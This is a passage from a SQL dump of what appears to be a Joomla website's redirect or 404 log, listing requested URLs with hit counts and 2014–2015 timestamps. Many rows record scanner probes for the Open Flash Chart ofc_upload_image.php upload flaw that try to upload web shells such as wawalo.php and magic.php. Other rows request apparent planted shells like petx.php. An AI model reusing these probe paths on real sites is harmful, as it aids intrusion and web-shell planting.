00:00:00',301),(6825,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_jdownloads&Itemid=101&view=upload&141214-202303','','','',1,0,'2014-12-14 19:22:57','0000-00-00 00:00:00',301),(6826,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-category-list/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=wawalo.php','','','',2,0,'2014-12-15 05:37:24','0000-00-00 00:00:00',301),(6827,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-category-list/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=wawalo.php.pHp','','','',2,0,'2014-12-15 05:37:28','0000-00-00 00:00:00',301),(6828,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-category-list/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/ofc-library/ofc_upload_image.php?name=wawalo.php','','','',1,0,'2014-12-15 05:37:31','0000-00-00 00:00:00',301),(6829,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-category-list/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=wawalo.php','','','',2,0,'2014-12-15 05:37:34','0000-00-00 00:00:00',301),(6830,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-category-list/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=wawalo.php.pHp','','','',2,0,'2014-12-15 05:37:35','0000-00-00 00:00:00',301),(6831,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-category-list/components/com_civicrm/civicrm/packages/OpenFlashChart/ofc-library/ofc_upload_image.php?name=wawalo.php','','','',1,0,'2014-12-15 05:37:42','0000-00-00 00:00:00',301),(6832,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-category-list/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=wawalo.php','','','',2,0,'2014-12-15 05:37:45','0000-00-00 00:00:00',301),(6833,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-category-list/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=wawalo.php.pHp','','','',2,0,'2014-12-15 05:37:47','0000-00-00 00:00:00',301),(6834,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-category-list/administrator/components/com_acymailing/inc/openflash/ofc-library/ofc_upload_image.php?name=wawalo.php','','','',1,0,'2014-12-15 05:37:49','0000-00-00 00:00:00',301),(6835,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-category-list/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=wawalo.php','','','',2,0,'2014-12-15 05:37:54','0000-00-00 00:00:00',301),(6836,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-category-list/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=wawalo.php.pHp','','','',2,0,'2014-12-15 05:38:11','0000-00-00 00:00:00',301),(6837,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-category-list/components/com_acymailing/inc/openflash/ofc-library/ofc_upload_image.php?name=wawalo.php','','','',1,0,'2014-12-15 05:38:16','0000-00-00 00:00:00',301),(6838,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-category-list/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=wawalo.php','','','',2,0,'2014-12-15 05:38:19','0000-00-00 00:00:00',301),(6839,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-category-list/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=wawalo.php.pHp','','','',2,0,'2014-12-15 05:38:21','0000-00-00 00:00:00',301),(6840,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-category-list/administrator/components/com_jnewsletter/includes/openflashchart/ofc-library/ofc_upload_image.php?name=wawalo.php','','','',1,0,'2014-12-15 05:38:22','0000-00-00 00:00:00',301),(6841,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-category-list/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=wawalo.php','','','',2,0,'2014-12-15 05:38:23','0000-00-00 00:00:00',301),(6842,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-category-list/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=wawalo.php.pHp','','','',2,0,'2014-12-15 05:38:24','0000-00-00 00:00:00',301),(6843,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-category-list/components/com_jnewsletter/includes/openflashchart/ofc-library/ofc_upload_image.php?name=wawalo.php','','','',1,0,'2014-12-15 05:38:25','0000-00-00 00:00:00',301),(6844,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-category-list/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=wawalo.php','','','',2,0,'2014-12-15 05:38:26','0000-00-00 00:00:00',301),(6845,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-category-list/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=wawalo.php.pHp','','','',2,0,'2014-12-15 05:38:29','0000-00-00 00:00:00',301),(6846,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-category-list/administrator/components/com_jinc/classes/graphics/ofc-library/ofc_upload_image.php?name=wawalo.php','','','',1,0,'2014-12-15 05:38:30','0000-00-00 00:00:00',301),(6847,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-category-list/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=wawalo.php','','','',2,0,'2014-12-15 05:38:32','0000-00-00 00:00:00',301),(6848,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-category-list/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=wawalo.php.pHp','','','',2,0,'2014-12-15 05:38:34','0000-00-00 00:00:00',301),(6849,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-category-list/components/com_jinc/classes/graphics/ofc-library/ofc_upload_image.php?name=wawalo.php','','','',1,0,'2014-12-15 05:38:35','0000-00-00 00:00:00',301),(6850,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-category-list/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=wawalo.php','','','',2,0,'2014-12-15 05:38:35','0000-00-00 00:00:00',301),(6851,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-category-list/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=wawalo.php.pHp','','','',2,0,'2014-12-15 05:38:36','0000-00-00 00:00:00',301),(6852,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-category-list/administrator/components/com_maian15/charts/ofc-library/ofc_upload_image.php?name=wawalo.php','','','',1,0,'2014-12-15 05:38:37','0000-00-00 00:00:00',301),(6853,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-category-list/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=wawalo.php','','','',2,0,'2014-12-15 05:38:37','0000-00-00 00:00:00',301),(6854,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-category-list/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=wawalo.php.pHp','','','',2,0,'2014-12-15 05:38:38','0000-00-00 00:00:00',301),(6855,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-category-list/components/com_maian15/charts/ofc-library/ofc_upload_image.php?name=wawalo.php','','','',1,0,'2014-12-15 05:38:40','0000-00-00 00:00:00',301),(6856,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-category-list/admin_area/charts/php-ofc-library/ofc_upload_image.php?name=wawalo.php','','','',1,0,'2014-12-15 05:38:42','0000-00-00 00:00:00',301),(6857,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-category-list/admin_area/charts/php-ofc-library/ofc_upload_image.php?name=wawalo.php.pHp','','','',1,0,'2014-12-15 05:38:51','0000-00-00 00:00:00',301),(6858,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-category-list/admin_area/charts/ofc-library/ofc_upload_image.php?name=wawalo.php','','','',1,0,'2014-12-15 05:38:54','0000-00-00 00:00:00',301),(6859,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-category-list/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=wawalo.php','','','',2,0,'2014-12-15 05:38:55','0000-00-00 00:00:00',301),(6860,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-category-list/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=wawalo.php.pHp','','','',2,0,'2014-12-15 05:38:56','0000-00-00 00:00:00',301),(6861,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-category-list/components/com_jnews/includes/openflashchart/ofc-library/ofc_upload_image.php?name=wawalo.php','','','',1,0,'2014-12-15 05:39:01','0000-00-00 00:00:00',301),(6862,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-category-list/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=wawalo.php','','','',2,0,'2014-12-15 05:39:02','0000-00-00 00:00:00',301),(6863,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-category-list/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=wawalo.php.pHp','','','',2,0,'2014-12-15 05:39:03','0000-00-00 00:00:00',301),(6864,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-category-list/administrator/components/com_jnews/includes/openflashchart/ofc-library/ofc_upload_image.php?name=wawalo.php','','','',1,0,'2014-12-15 05:39:04','0000-00-00 00:00:00',301),(6865,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=111&Itemid=122&lang=tr','','','',31,0,'2014-12-16 22:20:41','0000-00-00 00:00:00',301),(6866,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=158&Itemid=159&lang=tr','','','',33,0,'2014-12-16 22:21:24','0000-00-00 00:00:00',301),(6867,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=158:14fsfd&catid=44:pota&Itemid=159&lang=tr','','','',29,0,'2014-12-16 22:21:52','0000-00-00 00:00:00',301),(6868,'http://www.3s-technologies.com.tr/index.php/en/component/content/category/','','','',3,0,'2014-12-17 16:08:54','0000-00-00 00:00:00',301),(6869,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=109:orta-guclu-flux-giderici-dc1&catid=40:temizleme&Itemid=120&lang=tr','','','',30,0,'2014-12-19 13:55:06','0000-00-00 00:00:00',301),(6870,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=114:stensil-temizleme-rulolari-microwipe&catid=40:temizleme&Itemid=124&lang=tr','','','',31,0,'2014-12-19 13:55:27','0000-00-00 00:00:00',301),(6871,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=117:optik-cihaz-temizleyicileri&catid=40:temizleme&Itemid=128&lang=tr','','','',30,0,'2014-12-19 13:55:47','0000-00-00 00:00:00',301),(6872,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=119&Itemid=117&lang=tr','','','',38,0,'2014-12-19 13:55:55','0000-00-00 00:00:00',301),(6873,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/home-page','','','',1,0,'2014-12-20 08:27:47','0000-00-00 00:00:00',301),(6874,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ana-sayfa','','','',1,0,'2014-12-20 08:27:54','0000-00-00 00:00:00',301),(6875,'http://www.3s-technologies.com.tr/index.php/en//images/stories/go.gif','','','',1,0,'2014-12-21 18:54:39','0000-00-00 00:00:00',301),(6876,'http://www.3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/npm-detail+Result:+','','http://www.3s-technologies.com.tr/index.php/en/products/smd-ultra-h%C4%B1z/npm-detail+Result:+%ED%E5+%ED%E0%F8%EB%EE%F1%FC+%F4%EE%F0%EC%FB+%E4%EB%FF+%','',1,0,'2014-12-22 20:40:48','0000-00-00 00:00:00',301),(6877,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=152&Itemid=153&lang=tr','','','',2,0,'2014-12-23 11:59:17','0000-00-00 00:00:00',301),(6878,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=122&Itemid=129','','','',2,0,'2014-12-24 10:08:11','0000-00-00 00:00:00',301),(6879,'http://3s-technologies.com.tr/index.php/tr/ueruenler/b','','','',1,0,'2014-12-24 12:30:44','0000-00-00 00:00:00',301),(6880,'http://3s-technologies.com.tr/index.php/tr/ueruenler/','','','',1,0,'2014-12-24 12:31:48','0000-00-00 00:00:00',301),(6881,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-d','','','',1,0,'2014-12-24 12:37:38','0000-00-00 00:00:00',301),(6882,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-d','','','',1,0,'2014-12-24 23:48:32','0000-00-00 00:00:00',301),(6883,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/b','','','',1,0,'2014-12-24 23:48:44','0000-00-00 00:00:00',301),(6884,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/','','','',1,0,'2014-12-24 23:49:21','0000-00-00 00:00:00',301),(6885,'http://www.3s-technologies.com.tr/index.php/en/products/smd-d','','','',1,0,'2014-12-26 15:27:11','0000-00-00 00:00:00',301),(6886,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=140&Itemid=142&lang=en','','','',1,0,'2014-12-27 13:58:15','0000-00-00 00:00:00',301),(6887,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=146:manual-printer&catid=57:screen-printer&Itemid=148','','','',1,0,'2014-12-27 17:49:57','0000-00-00 00:00:00',301),(6888,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=109&Itemid=120&lang=en','','','',2,0,'2014-12-27 20:42:00','0000-00-00 00:00:00',301),(6889,'http://3s-technologies.com.tr/index.php/en/products/b','','','',1,0,'2014-12-28 06:56:53','0000-00-00 00:00:00',301),(6890,'http://3s-technologies.com.tr/index.php/en/products/','','','',1,0,'2014-12-28 06:57:09','0000-00-00 00:00:00',301),(6891,'http://3s-technologies.com.tr/index.php/en/products/smd-d','','','',1,0,'2014-12-28 07:02:39','0000-00-00 00:00:00',301),(6892,'http://www.3s-technologies.com.tr/index.php/en/products/','','','',1,0,'2014-12-28 17:47:46','0000-00-00 00:00:00',301),(6893,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/administrator/templates/hathor/images/header/icon-48-help_header.png','','','',1,0,'2014-12-29 11:15:57','0000-00-00 00:00:00',301),(6894,'http://3s-technologies.com.tr/index.php/en/?Itemid=2&id=43&lang=en&option=com_content&view=category','','','',1,0,'2014-12-29 17:37:45','0000-00-00 00:00:00',301),(6895,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=57:screen-printer&Itemid=145&layout=default&lang=en','','','',1,0,'2014-12-30 02:09:28','0000-00-00 00:00:00',301),(6896,'http://3s-technologies.com.tr/index.php/en/?Itemid=155&id=59&lang=en&option=com_content&view=category','','','',4,0,'2014-12-30 13:26:45','0000-00-00 00:00:00',301),(6897,'http://3s-technologies.com.tr/index.php/en/?Itemid=145&id=57&lang=en&option=com_content&view=category','','','',1,0,'2014-12-30 16:34:19','0000-00-00 00:00:00',301),(6898,'http://3s-technologies.com.tr/index.php/en/?Itemid=58&id=168&lang=en&option=com_content&view=article','','','',1,0,'2014-12-30 16:34:28','0000-00-00 00:00:00',301),(6899,'http://3s-technologies.com.tr/index.php/en/?Itemid=61&id=49&lang=en&option=com_content&view=category','','','',1,0,'2014-12-30 18:07:49','0000-00-00 00:00:00',301),(6900,'http://3s-technologies.com.tr/index.php/en/?Itemid=27&id=42&lang=en&option=com_content&view=category','','','',4,0,'2014-12-30 21:51:01','0000-00-00 00:00:00',301),(6901,'http://3s-technologies.com.tr/index.php/en/?Itemid=131&id=125&lang=en&option=com_content&view=article','','','',7,0,'2014-12-30 23:24:56','0000-00-00 00:00:00',301),(6902,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=54&Itemid=114&lang=en','','','',9,0,'2014-12-31 00:55:09','0000-00-00 00:00:00',301),(6903,'http://3s-technologies.com.tr/index.php/en/?Itemid=50&id=1&lang=en&layout=blog&limitstart=5&option=com_content&view=category','','','',7,0,'2014-12-31 00:58:30','0000-00-00 00:00:00',301),(6904,'http://3s-technologies.com.tr/index.php/en/?Itemid=133&id=126&lang=en&option=com_content&view=article','','','',4,0,'2014-12-31 07:15:17','0000-00-00 00:00:00',301),(6905,'http://3s-technologies.com.tr/index.php/en/?Itemid=142&catid=56:rework-stasyonlari&id=140:sharpshooter&lang=en&option=com_content&view=article','','','',6,0,'2014-12-31 16:40:02','0000-00-00 00:00:00',301),(6906,'http://3s-technologies.com.tr/index.php/en/?Itemid=60&id=40&lang=en&limitstart=10&option=com_content&view=category','','','',4,0,'2014-12-31 17:32:39','0000-00-00 00:00:00',301),(6907,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=80&Itemid=87&lang=tr','','','',2,0,'2014-12-31 18:46:58','0000-00-00 00:00:00',301),(6908,'http://3s-technologies.com.tr/index.php/en/?Itemid=57&id=39&lang=en&option=com_content&view=category','','','',1,0,'2014-12-31 20:39:35','0000-00-00 00:00:00',301),(6909,'http://3s-technologies.com.tr/index.php/en/?Itemid=159&id=158&lang=en&option=com_content&view=article','','','',1,0,'2014-12-31 21:33:52','0000-00-00 00:00:00',301),(6910,'http://3s-technologies.com.tr/index.php/en/?Itemid=40&id=81&lang=en&option=com_content&view=article','','','',1,0,'2014-12-31 22:13:12','0000-00-00 00:00:00',301),(6911,'http://3s-technologies.com.tr/index.php/en/?Itemid=142&id=140&lang=en&option=com_content&view=article','','','',5,0,'2015-01-01 02:54:12','0000-00-00 00:00:00',301),(6912,'http://3s-technologies.com.tr/index.php/en/?Itemid=114&id=54&lang=en&option=com_content&view=category','','','',6,0,'2015-01-01 03:48:55','0000-00-00 00:00:00',301),(6913,'http://3s-technologies.com.tr/index.php/en/?Itemid=137&id=56&lang=en&option=com_content&view=category','','','',1,0,'2015-01-01 07:35:00','0000-00-00 00:00:00',301),(6914,'http://3s-technologies.com.tr/index.php/en/?Itemid=62&id=46&lang=en&option=com_content&view=category','','','',1,0,'2015-01-01 09:55:10','0000-00-00 00:00:00',301),(6915,'http://3s-technologies.com.tr/index.php/en/?Itemid=92&id=51&lang=en&option=com_content&view=category','','','',1,0,'2015-01-01 11:36:56','0000-00-00 00:00:00',301),(6916,'http://3s-technologies.com.tr/index.php/en/?Itemid=104&id=93&lang=en&option=com_content&view=article','','','',7,0,'2015-01-01 12:15:35','0000-00-00 00:00:00',301),(6917,'http://3s-technologies.com.tr/index.php/en/?Itemid=100&id=88&lang=en&option=com_content&view=article','','','',1,0,'2015-01-03 19:52:44','0000-00-00 00:00:00',301),(6918,'http://3s-technologies.com.tr/index.php/en/?Itemid=134&id=127&lang=en&option=com_content&view=article','','','',1,0,'2015-01-03 19:52:48','0000-00-00 00:00:00',301),(6919,'http://3s-technologies.com.tr/index.php/en/?Itemid=110&id=53&lang=en&option=com_content&view=category','','','',1,0,'2015-01-04 00:32:59','0000-00-00 00:00:00',301),(6920,'http://3s-technologies.com.tr/index.php/en/?Itemid=102&id=90&lang=en&option=com_content&view=article','','','',9,0,'2015-01-04 03:39:38','0000-00-00 00:00:00',301),(6921,'http://3s-technologies.com.tr/index.php/en/?Itemid=161&id=160&lang=en&option=com_content&view=article','','','',5,0,'2015-01-04 06:46:27','0000-00-00 00:00:00',301),(6922,'http://3s-technologies.com.tr/index.php/en/?Itemid=37&id=36&lang=en&option=com_content&view=category','','','',1,0,'2015-01-04 13:46:35','0000-00-00 00:00:00',301),(6923,'http://3s-technologies.com.tr/index.php/en/?Itemid=28&id=1&lang=en&layout=blog&option=com_content&view=category','','','',4,0,'2015-01-05 03:45:24','0000-00-00 00:00:00',301),(6924,'http://3s-technologies.com.tr/index.php/en/?Itemid=55&id=41&lang=en&option=com_content&view=category','','','',1,0,'2015-01-05 04:32:30','0000-00-00 00:00:00',301),(6925,'http://3s-technologies.com.tr/index.php/en/?Itemid=164&id=60&lang=en&option=com_content&view=category','','','',4,0,'2015-01-05 09:57:52','0000-00-00 00:00:00',301),(6926,'http://3s-technologies.com.tr/index.php/en/?Itemid=56&id=44&lang=en&option=com_content&view=category','','','',1,0,'2015-01-05 10:45:21','0000-00-00 00:00:00',301),(6927,'http://www.3s-technologies.com.tr/index.php?option=com_user&view=reset','','','',4,0,'2015-01-05 13:17:42','0000-00-00 00:00:00',301),(6928,'http://www.3s-technologies.com.tr/index.php?option=com_user&view=reset&layout=confirm','','','',1,0,'2015-01-05 13:18:11','0000-00-00 00:00:00',301),(6929,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=158&Itemid=159&lang=tr','','','',1,0,'2015-01-07 15:43:25','0000-00-00 00:00:00',301),(6930,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/images/stories/petx.php?baca','','','',2,0,'2015-01-09 12:35:39','0000-00-00 00:00:00',301),(6931,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/images/stories/explore.php?baca','','','',2,0,'2015-01-09 12:35:42','0000-00-00 00:00:00',301),(6932,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/images/stories/magic.php.png','','','',2,0,'2015-01-09 12:36:03','0000-00-00 00:00:00',301),(6933,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/images/stories/magic.php.png?baca','','','',2,0,'2015-01-09 12:36:05','0000-00-00 00:00:00',301),(6934,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2015-01-12 14:10:52','0000-00-00 00:00:00',301),(6935,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2015-01-12 14:10:56','0000-00-00 00:00:00',301),(6936,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2015-01-12 14:10:57','0000-00-00 00:00:00',301),(6937,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2015-01-12 14:10:58','0000-00-00 00:00:00',301),(6938,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2015-01-12 14:10:59','0000-00-00 00:00:00',301),(6939,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2015-01-12 14:11:01','0000-00-00 00:00:00',301),(6940,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2015-01-12 14:11:02','0000-00-00 00:00:00',301),(6941,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2015-01-12 14:11:04','0000-00-00 00:00:00',301),(6942,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2015-01-12 14:11:05','0000-00-00 00:00:00',301),(6943,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2015-01-12 14:11:07','0000-00-00 00:00:00',301),(6944,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2015-01-12 14:11:09','0000-00-00 00:00:00',301),(6945,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2015-01-12 14:11:10','0000-00-00 00:00:00',301),(6946,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2015-01-12 14:11:12','0000-00-00 00:00:00',301),(6947,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2015-01-12 14:11:13','0000-00-00 00:00:00',301),(6948,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2015-01-12 14:11:23','0000-00-00 00:00:00',301),(6949,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2015-01-12 14:11:30','0000-00-00 00:00:00',301),(6950,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2015-01-12 14:11:40','0000-00-00 00:00:00',301),(6951,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2015-01-12 14:11:51','0000-00-00 00:00:00',301),(6952,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2015-01-12 14:12:03','0000-00-00 00:00:00',301),(6953,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2015-01-12 14:12:12','0000-00-00 00:00:00',301),(6954,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2015-01-12 14:12:33','0000-00-00 00:00:00',301),(6955,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2015-01-12 14:12:52','0000-00-00 00:00:00',301),(6956,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2015-01-12 14:13:06','0000-00-00 00:00:00',301),(6957,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2015-01-12 14:13:09','0000-00-00 00:00:00',301),(6958,'http://www.3s-technologies.com.tr/index.php/en/images/stories/pagat.php?rf','','','',1,0,'2015-01-13 12:33:47','0000-00-00 00:00:00',301),(6959,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=168&Itemid=58&lang=en','','','',1,0,'2015-01-14 02:53:27','0000-00-00 00:00:00',301),(6960,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=156&Itemid=157&lang=tr','','','',1,0,'2015-01-15 16:33:20','0000-00-00 00:00:00',301),(6961,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/using-joomla/extensions/components/content-component/administrator/templates/hathor/images/header/icon-48-help_header.png','','','',3,0,'2015-01-16 